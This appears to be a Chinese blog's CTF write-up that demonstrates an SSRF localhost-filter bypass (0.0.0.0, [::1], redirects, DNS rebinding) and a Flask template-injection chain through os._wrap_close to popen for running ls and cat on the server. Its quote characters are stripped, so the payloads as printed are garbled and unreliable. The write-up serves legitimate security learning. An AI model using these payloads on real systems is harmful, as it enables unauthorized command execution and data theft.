响水建设局网站,软件开发定制app,pc做网站,昆明云南微网站搭建哪家好Python中的安全问题CTF
1.Python里的SSRF
题目提示
尝试访问到容器内部的 8000 端口和 url path /api/internal/secret 即可获取 flag
访问url#xff1a;
http://f5704bb3-5869-4ecb-9bdc-58b022589224.node3.buuoj.cn/
回显如下#xff1a; 通过提示构造payload…Python中的安全问题CTF
1.Python里的SSRF
题目提示
尝试访问到容器内部的 8000 端口和 url path /api/internal/secret 即可获取 flag
访问url
http://f5704bb3-5869-4ecb-9bdc-58b022589224.node3.buuoj.cn/
回显如下 通过提示构造payload
?urlhttp://127.0.0.1:8000/api/internal/secret
进行访问 回显提示127.0.0.1是禁止的因为127.0.0.1是本地的地址提示是说访问容器内部的地址
所以我们可以用0.0.0.0代替127.0.0.1
重新构造payload
?urlhttp://0.0.0.0:8000/api/internal/secret
成功得到flag 其他不同的方式得多尝试一下
官方wp
本题有多重解法
- 0.0.0.0:8000 绕过
- [::1]:8000 绕过需要支持 ipv6)
- 重定向跳转到 127.0.0.1:8000
- dns rebinding 输入一个域名第一次解析到非 127.0.0.1 地址上第二个解析到 127.0.0.1 上。2.python模板注入(SSTI)
访问url页面回显 password is wrong但是没有输入密码的地方 所以从 url 提交
?password{{3*3}}
发现可以识别并且正确回显 据回显的结果可以判断这是一个flask模板注入
参考
flask之ssti模版注入从零到入门
通过以下语句
/?password{{.__class__.__bases__[0].__subclasses__()}}拿到可用的类的列表 我们需要的是os命令执行类class ‘os._wrap_close’ 我们要判断他所属的位置这样才能进行索引,将全部类复制放到pycharm(与他有同样功能的工具也行),我们索引逗号的位置我们索引到我们需要类的位置,再在索引他前面逗号的位置我这里索引的结果是127,如果不对上下浮动几位看一下大概就这个位置我这127是正确的 我们可以先看一下我们索引的是否正确,输入url
/?password{{.__class__.__bases__[0].__subclasses__()[127]}}我这里索引的结果是127,如果不对上下浮动几位看一下大概就这个位置我这127是正确的,所以索引结果就是class ‘os._wrap_close’ 构造语句,并执行ls命令(对方是Linux服务器,所以要使用Linux命令)
/?password{{.__class__.__bases__[0].__subclasses__()[127].__init__.__globals__[popen](ls).read()}}文件夹如下 最引起我们注意的就是app这个文件夹
经过一些尝试(目录遍历什么的)我们得知flag就在/app/server.py中,我们直接用cat查看文件内容就行
/?password{{.__class__.__bases__[0].__subclasses__()[127].__init__.__globals__[popen](cat /app/server.py).read()}}成功获取flag 文笔生疏措辞浅薄望各位大佬不吝赐教万分感谢。
免责声明由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失均由使用者本人负责 文章作者不为此承担任何责任。
转载声明儒道易行 拥有对此文章的修改和解释权如欲转载或传播此文章必须保证此文章的完整性包括版权声明等全部内容。未经作者允许不得任意修改或者增减此文章的内容不得以任何方式将其用于商业目的。
博客:
https://rdyx0.github.io/先知社区
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097CSDN:
https://blog.csdn.net/weixin_48899364?typeblog公众号
https://mp.weixin.qq.com/mp/appmsgalbum?__bizMzg5NTU2NjA1Mwactiongetalbumalbum_id1696286248027357190scene173from_msgid2247485408from_itemidx1count3nolastread1#wechat_redirectFreeBuf
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
